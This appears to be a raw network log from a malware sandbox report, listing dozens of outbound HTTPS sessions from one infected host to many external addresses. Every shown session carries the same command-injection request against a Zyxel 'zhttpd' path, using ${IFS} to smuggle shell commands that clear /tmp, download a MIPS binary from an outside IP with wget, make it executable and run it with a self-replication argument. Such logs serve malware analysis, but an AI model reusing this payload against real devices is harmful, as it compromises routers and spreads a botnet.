                                                Jan 12, 2024 18:16:25.504843950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5072192.168.2.2355416201.17.27.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504870892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5073192.168.2.2336958134.121.18.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504934072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5074192.168.2.235375483.249.203.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504970074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5075192.168.2.234201497.3.244.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504995108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5076192.168.2.234460277.157.232.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505049944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5077192.168.2.2355046151.161.114.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505076885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5078192.168.2.2332778111.163.140.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505134106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5079192.168.2.2338656116.238.213.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505177021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5080192.168.2.2349242102.63.74.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505213022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5081192.168.2.2352602158.159.177.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505260944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5082192.168.2.2352782216.29.184.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505305052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5083192.168.2.233722662.244.171.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505337954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5084192.168.2.2344692114.180.130.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505388975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5085192.168.2.235487241.134.176.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505409956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5086192.168.2.235654431.178.176.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505445957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5087192.168.2.235375840.22.98.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505477905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5088192.168.2.2355148178.162.158.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505503893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5089192.168.2.2350614109.73.77.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505537987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5090192.168.2.2333990216.128.7.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505583048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5091192.168.2.2346544153.231.99.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505623102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5092192.168.2.23490384.112.86.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505650043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5093192.168.2.234780259.184.245.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505692005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5094192.168.2.2357416168.35.158.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505738020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5095192.168.2.2355562203.108.158.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505784988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5096192.168.2.233599289.134.150.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505817890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5097192.168.2.2348412153.76.189.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505856991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5098192.168.2.233933439.44.34.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505883932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5099192.168.2.2346644181.190.254.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505940914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5100192.168.2.2349512210.123.42.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.505979061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5101192.168.2.2344690195.23.162.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506009102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5102192.168.2.2340822137.45.176.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506053925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5103192.168.2.2335088217.31.148.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506077051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5104192.168.2.234503232.170.225.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506104946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5105192.168.2.2360564170.71.241.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506141901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5106192.168.2.2334086158.156.158.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506174088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5107192.168.2.2350088132.128.228.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506227970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5108192.168.2.234172487.150.172.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506268978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5109192.168.2.2341956218.162.143.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506308079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5110192.168.2.234866092.181.240.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506342888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5111192.168.2.2348794191.66.187.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506402969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5112192.168.2.234127419.204.192.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506428957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5113192.168.2.235188270.168.99.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.506443977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5114192.168.2.235619284.252.61.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524138927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5115192.168.2.2354804222.162.47.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524168968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5116192.168.2.234041624.198.178.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524209023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5117192.168.2.235859081.25.7.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524262905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5118192.168.2.235708069.187.213.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524296999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5119192.168.2.235868437.58.91.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524316072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5120192.168.2.235186695.227.36.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524359941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5121192.168.2.234466252.168.101.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524395943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5122192.168.2.233805062.185.152.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524429083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5123192.168.2.2355812114.24.140.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524486065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5124192.168.2.2335492183.1.179.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524521112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5125192.168.2.233314618.178.128.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524542093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5126192.168.2.2352800117.186.153.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524585009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5127192.168.2.2353406131.174.250.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524624109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5128192.168.2.233693298.173.91.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524661064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5129192.168.2.234828879.4.254.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524699926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5130192.168.2.2335806162.241.124.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524738073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5131192.168.2.2341492169.156.184.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524761915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5132192.168.2.2338542123.23.16.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524807930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5133192.168.2.235864449.46.26.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524842978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5134192.168.2.2335708182.228.204.91443
                                                TimestampBytes transferredDirectionData
